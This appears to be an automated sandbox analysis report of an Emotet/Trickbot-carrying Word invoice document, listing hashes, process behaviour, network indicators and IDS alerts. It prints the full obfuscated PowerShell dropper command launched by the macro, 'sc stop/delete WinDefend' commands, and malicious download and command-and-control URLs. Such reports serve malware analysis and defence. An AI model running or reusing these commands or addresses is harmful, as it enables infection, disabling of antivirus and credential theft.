analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INVOICE_C0-03-99-8816.doc

Full analysis: https://app.any.run/tasks/1eb6a9a4-1f7a-4fa4-bb2d-c4cefd4e079f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 08:07:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
evasion
trickbot
stealer
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Cole-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

5E85C3EBED20DC34766E9B1DB3CB8740

SHA1:

90A1B85EEF0DFECBA2D7A7AA63E60C290FC59706

SHA256:

F5157BB10F4869655706640C47F5DEDD2A97A8FFD49284FFF261427521F66BEB

SSDEEP:

768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92pw6ZCrrjIu:L9Eocn1kp59gxBK85fBt+a91j

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3724)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3724)
    • Application was dropped or rewritten from another process

      • 232.exe (PID: 2080)
      • 232.exe (PID: 3956)
      • lpiograd.exe (PID: 3108)
      • lpiograd.exe (PID: 1004)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3088)
      • svchost.exe (PID: 1012)
    • EMOTET was detected

      • lpiograd.exe (PID: 1004)
    • FEODO was detected

      • lpiograd.exe (PID: 1004)
    • Connects to CnC server

      • lpiograd.exe (PID: 1004)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 1004)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3372)
    • Loads the Task Scheduler COM API

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
    • Stealing of credential data

      • svchost.exe (PID: 4064)
    • Uses SVCHOST.EXE for hidden code execution

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files with a strange extension

      • svchost.exe (PID: 1012)
    • Trickbot detected

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files from IP

      • svchost.exe (PID: 1012)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 1920)
      • cmd.exe (PID: 120)
      • cmd.exe (PID: 3700)
    • Creates files in the user directory

      • powershell.exe (PID: 3088)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • powershell.exe (PID: 3776)
      • powershell.exe (PID: 3344)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • svchost.exe (PID: 1012)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3088)
      • 232.exe (PID: 3956)
      • lpiograd.exe (PID: 1004)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • svchost.exe (PID: 1012)
    • Starts itself from another location

      • 232.exe (PID: 3956)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 2288)
      • cmd.exe (PID: 3424)
      • cmd.exe (PID: 3456)
    • Creates files in the program directory

      • lpiograd.exe (PID: 1004)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Starts CMD.EXE for commands execution

      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
      • svchost.exe (PID: 3676)
    • Checks for external IP

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Connects to unusual port

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • svchost.exe (PID: 4064)
    • Creates files in the Windows directory

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Removes files from Windows directory

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 2128)
      • cmd.exe (PID: 3112)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3724)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3724)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 03:58:00
CreateDate: 2018:11:08 03:58:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Cole-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
88
Monitored processes
37
Malicious processes
10
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 232.exe no specs 232.exe lpiograd.exe no specs #EMOTET lpiograd.exe 2tlcxmshm32joaoig.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs 2tmdxmsim32joaojg.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs #TRICKBOT 2tmdxmsim32joaojg.exe svchost.exe no specs svchost.exe no specs svchost.exe svchost.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs cmd.exe no specs net.exe no specs svchost.exe cmd.exe no specs net.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3724"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_C0-03-99-8816.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1920CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3088POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2080"C:\Users\admin\AppData\Local\Temp\232.exe" C:\Users\admin\AppData\Local\Temp\232.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3956"C:\Users\admin\AppData\Local\Temp\232.exe"C:\Users\admin\AppData\Local\Temp\232.exe
232.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3108"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe232.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
1004"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
2744"C:\ProgramData\2tLCxMSHM32joaoIg.exe"C:\ProgramData\2tLCxMSHM32joaoIg.exe
lpiograd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Developed using the Dev-C++ IDE
Exit code:
0
Version:
1.0.0.0
2288/c sc stop WinDefendC:\Windows\system32\cmd.exe2tLCxMSHM32joaoIg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1052/c sc delete WinDefendC:\Windows\system32\cmd.exe2tLCxMSHM32joaoIg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 631
Read events
2 090
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
27
Text files
4
Unknown types
5

Dropped files

PID
Process
Filename
Type
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3052.tmp.cvr
MD5:
SHA256:
3088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SWZ2I2IEOZ9118SZLHD.temp
MD5:
SHA256:
3776powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TI3UO3FT3CHNPDDXVLKF.temp
MD5:
SHA256:
3344powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IN7J1CI6D1ELRFIOGKTG.temp
MD5:
SHA256:
31962tMDxMSIM32joaoJg.exeC:\Windows\TEMP\Tar8E67.tmp
MD5:
SHA256:
31962tMDxMSIM32joaoJg.exeC:\Windows\TEMP\Cab8ED6.tmp
MD5:
SHA256:
31962tMDxMSIM32joaoJg.exeC:\Windows\TEMP\Tar8ED7.tmp
MD5:
SHA256:
31962tMDxMSIM32joaoJg.exeC:\Windows\TEMP\CabA4F0.tmp
MD5:
SHA256:
31962tMDxMSIM32joaoJg.exeC:\Windows\TEMP\TarA4F1.tmp
MD5:
SHA256:
3088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
14
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3088
powershell.exe
GET
200
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg/
US
executable
132 Kb
malicious
1004
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
132 b
malicious
1004
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
13 b
malicious
3196
2tMDxMSIM32joaoJg.exe
GET
200
8.248.121.254:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
54.4 Kb
whitelisted
4064
svchost.exe
POST
200
24.247.181.125:8082
http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/
US
text
3 b
suspicious
4064
svchost.exe
POST
200
24.247.181.125:8082
http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/83/
US
text
3 b
suspicious
1012
svchost.exe
GET
200
192.227.186.151:80
http://192.227.186.151/radiance.png
US
executable
428 Kb
suspicious
4064
svchost.exe
POST
200
24.247.181.125:8082
http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/
US
text
3 b
suspicious
1004
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
3088
powershell.exe
GET
301
50.62.102.1:80
http://boxofgiggles.com/Ts7kBW9Yg
US
html
308 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3196
2tMDxMSIM32joaoJg.exe
74.134.5.113:449
Time Warner Cable Internet LLC
US
unknown
3196
2tMDxMSIM32joaoJg.exe
34.233.102.38:80
checkip.amazonaws.com
Amazon.com, Inc.
US
shared
1004
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
3088
powershell.exe
50.62.102.1:80
boxofgiggles.com
GoDaddy.com, LLC
US
malicious
1004
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
3196
2tMDxMSIM32joaoJg.exe
8.248.121.254:80
www.download.windowsupdate.com
Level 3 Communications, Inc.
US
unknown
4064
svchost.exe
24.247.181.125:8082
Charter Communications
US
suspicious
1012
svchost.exe
192.227.186.151:80
ColoCrossing
US
suspicious
3196
2tMDxMSIM32joaoJg.exe
92.38.135.209:447
RU
suspicious

DNS requests

Domain
IP
Reputation
boxofgiggles.com
  • 50.62.102.1
malicious
checkip.amazonaws.com
  • 34.233.102.38
  • 34.192.84.239
  • 107.23.175.217
  • 52.1.46.34
  • 52.202.139.131
  • 52.204.60.216
shared
www.download.windowsupdate.com
  • 8.248.121.254
  • 67.26.137.254
  • 8.253.204.120
  • 67.27.233.126
  • 8.253.95.121
whitelisted
18.89.147.217.zen.spamhaus.org
unknown
18.89.147.217.b.barracudacentral.org
unknown
18.89.147.217.cbl.abuseat.org
unknown
18.89.147.217.dnsbl-1.uceprotect.net
unknown
18.89.147.217.spam.dnsbl.sorbs.net
unknown

Threats

PID
Process
Class
Message
3088
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3088
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3088
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3088
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1004
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1004
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3196
2tMDxMSIM32joaoJg.exe
Not Suspicious Traffic
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
3196
2tMDxMSIM32joaoJg.exe
A Network Trojan was detected
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
3196
2tMDxMSIM32joaoJg.exe
Not Suspicious Traffic
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
3196
2tMDxMSIM32joaoJg.exe
Not Suspicious Traffic
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
8 ETPRO signatures available at the full report
No debug info